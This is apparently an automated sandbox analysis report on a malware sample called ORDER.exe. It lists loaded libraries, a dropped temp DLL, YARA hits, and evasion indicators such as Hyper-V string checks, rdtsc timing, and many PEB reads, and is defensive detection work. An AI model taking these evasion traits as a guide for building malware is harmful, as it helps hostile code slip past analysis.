      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Besiddetrang.lnk.0.drLNK file: ..\..\..\Program Files (x86)\rytmiskes.cry
      Source: ORDER.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: ORDER.exe, 00000003.00000001.32174271412.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: wntdll.pdbUGP source: ORDER.exe, 00000003.00000003.32254123213.000000003209F000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32257379094.000000003224B000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: ORDER.exe, ORDER.exe, 00000003.00000003.32254123213.000000003209F000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32257379094.000000003224B000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: ORDER.exe, 00000003.00000001.32174271412.0000000000649000.00000020.00000001.01000000.00000008.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.32236386433.00000000050E4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_00406061 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406061
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_10002D30 push eax; ret 0_2_10002D5E
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324208CD push ecx; mov dword ptr [esp], ecx3_2_324208D6
      Source: C:\Users\user\Desktop\ORDER.exeFile created: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\ORDER.exeAPI/Special instruction interceptor: Address: 55F05F4
      Source: C:\Users\user\Desktop\ORDER.exeAPI/Special instruction interceptor: Address: 1CA05F4
      Source: C:\Users\user\Desktop\ORDER.exeAPI/Special instruction interceptor: Address: 7FFC360D0594
      Source: C:\Users\user\Desktop\ORDER.exeAPI/Special instruction interceptor: Address: 7FFC360CFF74
      Source: C:\Users\user\Desktop\ORDER.exeAPI/Special instruction interceptor: Address: 7FFC360CD6C4
      Source: C:\Users\user\Desktop\ORDER.exeAPI/Special instruction interceptor: Address: 7FFC360CD864
      Source: C:\Users\user\Desktop\ORDER.exeAPI/Special instruction interceptor: Address: 7FFC360CD004
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32461763 rdtsc 3_2_32461763
      Source: C:\Users\user\Desktop\ORDER.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\ORDER.exeAPI coverage: 0.6 %
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_0040603A FindFirstFileA,FindClose,0_2_0040603A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_004055F6 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_004055F6
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
      Source: ORDER.exe, 00000003.00000002.32870989524.00000000022EE000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516873617.00000000022ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0M1
      Source: ORDER.exe, 00000003.00000002.32870989524.0000000002310000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516873617.0000000002310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWE
      Source: ORDER.exe, 00000003.00000003.32255056072.0000000002328000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000002.32870989524.0000000002328000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\ORDER.exeAPI call chain: ExitProcess graph end nodegraph_0-4282
      Source: C:\Users\user\Desktop\ORDER.exeAPI call chain: ExitProcess graph end nodegraph_0-4276
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32461763 rdtsc 3_2_32461763
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_00405D58 GetVersion,LdrInitializeThunk,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D58
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_00406061 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406061
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DF247 mov eax, dword ptr fs:[00000030h]3_2_324DF247
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244F24A mov eax, dword ptr fs:[00000030h]3_2_3244F24A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249D250 mov eax, dword ptr fs:[00000030h]3_2_3249D250
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249D250 mov ecx, dword ptr fs:[00000030h]3_2_3249D250
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241B273 mov eax, dword ptr fs:[00000030h]3_2_3241B273
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241B273 mov eax, dword ptr fs:[00000030h]3_2_3241B273
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241B273 mov eax, dword ptr fs:[00000030h]3_2_3241B273
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DD270 mov eax, dword ptr fs:[00000030h]3_2_324DD270
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241A200 mov eax, dword ptr fs:[00000030h]3_2_3241A200
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241821B mov eax, dword ptr fs:[00000030h]3_2_3241821B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324AB214 mov eax, dword ptr fs:[00000030h]3_2_324AB214
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324AB214 mov eax, dword ptr fs:[00000030h]3_2_324AB214
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A0227 mov eax, dword ptr fs:[00000030h]3_2_324A0227
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A0227 mov eax, dword ptr fs:[00000030h]3_2_324A0227
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A0227 mov eax, dword ptr fs:[00000030h]3_2_324A0227
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245A22B mov eax, dword ptr fs:[00000030h]3_2_3245A22B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245A22B mov eax, dword ptr fs:[00000030h]3_2_3245A22B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245A22B mov eax, dword ptr fs:[00000030h]3_2_3245A22B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32440230 mov ecx, dword ptr fs:[00000030h]3_2_32440230
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324432C5 mov eax, dword ptr fs:[00000030h]3_2_324432C5
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F32C9 mov eax, dword ptr fs:[00000030h]3_2_324F32C9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324172E0 mov eax, dword ptr fs:[00000030h]3_2_324172E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324282E0 mov eax, dword ptr fs:[00000030h]3_2_324282E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324282E0 mov eax, dword ptr fs:[00000030h]3_2_324282E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324282E0 mov eax, dword ptr fs:[00000030h]3_2_324282E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324282E0 mov eax, dword ptr fs:[00000030h]3_2_324282E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242A2E0 mov eax, dword ptr fs:[00000030h]3_2_3242A2E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242A2E0 mov eax, dword ptr fs:[00000030h]3_2_3242A2E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242A2E0 mov eax, dword ptr fs:[00000030h]3_2_3242A2E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242A2E0 mov eax, dword ptr fs:[00000030h]3_2_3242A2E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242A2E0 mov eax, dword ptr fs:[00000030h]3_2_3242A2E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242A2E0 mov eax, dword ptr fs:[00000030h]3_2_3242A2E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241D2EC mov eax, dword ptr fs:[00000030h]3_2_3241D2EC
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241D2EC mov eax, dword ptr fs:[00000030h]3_2_3241D2EC
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324302F9 mov eax, dword ptr fs:[00000030h]3_2_324302F9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324302F9 mov eax, dword ptr fs:[00000030h]3_2_324302F9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324302F9 mov eax, dword ptr fs:[00000030h]3_2_324302F9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324302F9 mov eax, dword ptr fs:[00000030h]3_2_324302F9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324302F9 mov eax, dword ptr fs:[00000030h]3_2_324302F9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324302F9 mov eax, dword ptr fs:[00000030h]3_2_324302F9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324302F9 mov eax, dword ptr fs:[00000030h]3_2_324302F9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324302F9 mov eax, dword ptr fs:[00000030h]3_2_324302F9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249E289 mov eax, dword ptr fs:[00000030h]3_2_3249E289
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32427290 mov eax, dword ptr fs:[00000030h]3_2_32427290
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32427290 mov eax, dword ptr fs:[00000030h]3_2_32427290
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32427290 mov eax, dword ptr fs:[00000030h]3_2_32427290
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DF2AE mov eax, dword ptr fs:[00000030h]3_2_324DF2AE
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324E92AB mov eax, dword ptr fs:[00000030h]3_2_324E92AB
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324192AF mov eax, dword ptr fs:[00000030h]3_2_324192AF
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241C2B0 mov ecx, dword ptr fs:[00000030h]3_2_3241C2B0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324FB2BC mov eax, dword ptr fs:[00000030h]3_2_324FB2BC
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324FB2BC mov eax, dword ptr fs:[00000030h]3_2_324FB2BC
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324FB2BC mov eax, dword ptr fs:[00000030h]3_2_324FB2BC
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324FB2BC mov eax, dword ptr fs:[00000030h]3_2_324FB2BC
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32418347 mov eax, dword ptr fs:[00000030h]3_2_32418347
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32418347 mov eax, dword ptr fs:[00000030h]3_2_32418347
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32418347 mov eax, dword ptr fs:[00000030h]3_2_32418347
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245A350 mov eax, dword ptr fs:[00000030h]3_2_3245A350
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E363 mov eax, dword ptr fs:[00000030h]3_2_3245E363
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E363 mov eax, dword ptr fs:[00000030h]3_2_3245E363
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E363 mov eax, dword ptr fs:[00000030h]3_2_3245E363
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E363 mov eax, dword ptr fs:[00000030h]3_2_3245E363
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E363 mov eax, dword ptr fs:[00000030h]3_2_3245E363
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E363 mov eax, dword ptr fs:[00000030h]3_2_3245E363
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E363 mov eax, dword ptr fs:[00000030h]3_2_3245E363
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E363 mov eax, dword ptr fs:[00000030h]3_2_3245E363
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A0371 mov eax, dword ptr fs:[00000030h]3_2_324A0371
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A0371 mov eax, dword ptr fs:[00000030h]3_2_324A0371
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32419303 mov eax, dword ptr fs:[00000030h]3_2_32419303
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32419303 mov eax, dword ptr fs:[00000030h]3_2_32419303
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DF30A mov eax, dword ptr fs:[00000030h]3_2_324DF30A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243E310 mov eax, dword ptr fs:[00000030h]3_2_3243E310
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243E310 mov eax, dword ptr fs:[00000030h]3_2_3243E310
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243E310 mov eax, dword ptr fs:[00000030h]3_2_3243E310
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245631F mov eax, dword ptr fs:[00000030h]3_2_3245631F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32458322 mov eax, dword ptr fs:[00000030h]3_2_32458322
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32458322 mov eax, dword ptr fs:[00000030h]3_2_32458322
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32458322 mov eax, dword ptr fs:[00000030h]3_2_32458322
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244332D mov eax, dword ptr fs:[00000030h]3_2_3244332D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241E328 mov eax, dword ptr fs:[00000030h]3_2_3241E328
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241E328 mov eax, dword ptr fs:[00000030h]3_2_3241E328
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241E328 mov eax, dword ptr fs:[00000030h]3_2_3241E328
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F3336 mov eax, dword ptr fs:[00000030h]3_2_324F3336
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241E3C0 mov eax, dword ptr fs:[00000030h]3_2_3241E3C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241E3C0 mov eax, dword ptr fs:[00000030h]3_2_3241E3C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241E3C0 mov eax, dword ptr fs:[00000030h]3_2_3241E3C0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241C3C7 mov eax, dword ptr fs:[00000030h]3_2_3241C3C7
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324263CB mov eax, dword ptr fs:[00000030h]3_2_324263CB
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324533D0 mov eax, dword ptr fs:[00000030h]3_2_324533D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324543D0 mov ecx, dword ptr fs:[00000030h]3_2_324543D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A43D5 mov eax, dword ptr fs:[00000030h]3_2_324A43D5
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32421380 mov eax, dword ptr fs:[00000030h]3_2_32421380
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32421380 mov eax, dword ptr fs:[00000030h]3_2_32421380
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32421380 mov eax, dword ptr fs:[00000030h]3_2_32421380
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32421380 mov eax, dword ptr fs:[00000030h]3_2_32421380
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32421380 mov eax, dword ptr fs:[00000030h]3_2_32421380
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243F380 mov eax, dword ptr fs:[00000030h]3_2_3243F380
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243F380 mov eax, dword ptr fs:[00000030h]3_2_3243F380
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243F380 mov eax, dword ptr fs:[00000030h]3_2_3243F380
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243F380 mov eax, dword ptr fs:[00000030h]3_2_3243F380
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243F380 mov eax, dword ptr fs:[00000030h]3_2_3243F380
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243F380 mov eax, dword ptr fs:[00000030h]3_2_3243F380
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DF38A mov eax, dword ptr fs:[00000030h]3_2_324DF38A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244A390 mov eax, dword ptr fs:[00000030h]3_2_3244A390
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244A390 mov eax, dword ptr fs:[00000030h]3_2_3244A390
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244A390 mov eax, dword ptr fs:[00000030h]3_2_3244A390
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324293A6 mov eax, dword ptr fs:[00000030h]3_2_324293A6
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324293A6 mov eax, dword ptr fs:[00000030h]3_2_324293A6
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3249C3B0 mov eax, dword ptr fs:[00000030h]3_2_3249C3B0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32450044 mov eax, dword ptr fs:[00000030h]3_2_32450044
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A6040 mov eax, dword ptr fs:[00000030h]3_2_324A6040
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32421051 mov eax, dword ptr fs:[00000030h]3_2_32421051
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32421051 mov eax, dword ptr fs:[00000030h]3_2_32421051
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F505B mov eax, dword ptr fs:[00000030h]3_2_324F505B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324C9060 mov eax, dword ptr fs:[00000030h]3_2_324C9060
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32427072 mov eax, dword ptr fs:[00000030h]3_2_32427072
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32426074 mov eax, dword ptr fs:[00000030h]3_2_32426074
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32426074 mov eax, dword ptr fs:[00000030h]3_2_32426074
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32445004 mov eax, dword ptr fs:[00000030h]3_2_32445004
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32445004 mov ecx, dword ptr fs:[00000030h]3_2_32445004
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32428009 mov eax, dword ptr fs:[00000030h]3_2_32428009
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32462010 mov ecx, dword ptr fs:[00000030h]3_2_32462010
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241D02D mov eax, dword ptr fs:[00000030h]3_2_3241D02D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243B0D0 mov eax, dword ptr fs:[00000030h]3_2_3243B0D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241B0D6 mov eax, dword ptr fs:[00000030h]3_2_3241B0D6
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241B0D6 mov eax, dword ptr fs:[00000030h]3_2_3241B0D6
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241B0D6 mov eax, dword ptr fs:[00000030h]3_2_3241B0D6
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241B0D6 mov eax, dword ptr fs:[00000030h]3_2_3241B0D6
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245D0F0 mov eax, dword ptr fs:[00000030h]3_2_3245D0F0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245D0F0 mov ecx, dword ptr fs:[00000030h]3_2_3245D0F0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241C0F6 mov eax, dword ptr fs:[00000030h]3_2_3241C0F6
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324190F8 mov eax, dword ptr fs:[00000030h]3_2_324190F8
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324190F8 mov eax, dword ptr fs:[00000030h]3_2_324190F8
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324190F8 mov eax, dword ptr fs:[00000030h]3_2_324190F8
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324190F8 mov eax, dword ptr fs:[00000030h]3_2_324190F8
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F4080 mov eax, dword ptr fs:[00000030h]3_2_324F4080
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F4080 mov eax, dword ptr fs:[00000030h]3_2_324F4080
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F4080 mov eax, dword ptr fs:[00000030h]3_2_324F4080
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F4080 mov eax, dword ptr fs:[00000030h]3_2_324F4080
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F4080 mov eax, dword ptr fs:[00000030h]3_2_324F4080
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F4080 mov eax, dword ptr fs:[00000030h]3_2_324F4080
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F4080 mov eax, dword ptr fs:[00000030h]3_2_324F4080
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241C090 mov eax, dword ptr fs:[00000030h]3_2_3241C090
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241A093 mov ecx, dword ptr fs:[00000030h]3_2_3241A093
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DB0AF mov eax, dword ptr fs:[00000030h]3_2_324DB0AF
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324600A5 mov eax, dword ptr fs:[00000030h]3_2_324600A5
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F50B7 mov eax, dword ptr fs:[00000030h]3_2_324F50B7
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324B314A mov eax, dword ptr fs:[00000030h]3_2_324B314A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324B314A mov eax, dword ptr fs:[00000030h]3_2_324B314A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324B314A mov eax, dword ptr fs:[00000030h]3_2_324B314A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324B314A mov eax, dword ptr fs:[00000030h]3_2_324B314A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F5149 mov eax, dword ptr fs:[00000030h]3_2_324F5149
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241A147 mov eax, dword ptr fs:[00000030h]3_2_3241A147
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241A147 mov eax, dword ptr fs:[00000030h]3_2_3241A147
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241A147 mov eax, dword ptr fs:[00000030h]3_2_3241A147
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F3157 mov eax, dword ptr fs:[00000030h]3_2_324F3157
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F3157 mov eax, dword ptr fs:[00000030h]3_2_324F3157
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324F3157 mov eax, dword ptr fs:[00000030h]3_2_324F3157
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245415F mov eax, dword ptr fs:[00000030h]3_2_3245415F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245716D mov eax, dword ptr fs:[00000030h]3_2_3245716D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32426179 mov eax, dword ptr fs:[00000030h]3_2_32426179
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3247717A mov eax, dword ptr fs:[00000030h]3_2_3247717A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3247717A mov eax, dword ptr fs:[00000030h]3_2_3247717A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244510F mov eax, dword ptr fs:[00000030h]3_2_3244510F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244510F mov eax, dword ptr fs:[00000030h]3_2_3244510F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244510F mov eax, dword ptr fs:[00000030h]3_2_3244510F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244510F mov eax, dword ptr fs:[00000030h]3_2_3244510F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244510F mov eax, dword ptr fs:[00000030h]3_2_3244510F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244510F mov eax, dword ptr fs:[00000030h]3_2_3244510F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244510F mov eax, dword ptr fs:[00000030h]3_2_3244510F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244510F mov eax, dword ptr fs:[00000030h]3_2_3244510F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244510F mov eax, dword ptr fs:[00000030h]3_2_3244510F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244510F mov eax, dword ptr fs:[00000030h]3_2_3244510F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244510F mov eax, dword ptr fs:[00000030h]3_2_3244510F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244510F mov eax, dword ptr fs:[00000030h]3_2_3244510F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244510F mov eax, dword ptr fs:[00000030h]3_2_3244510F
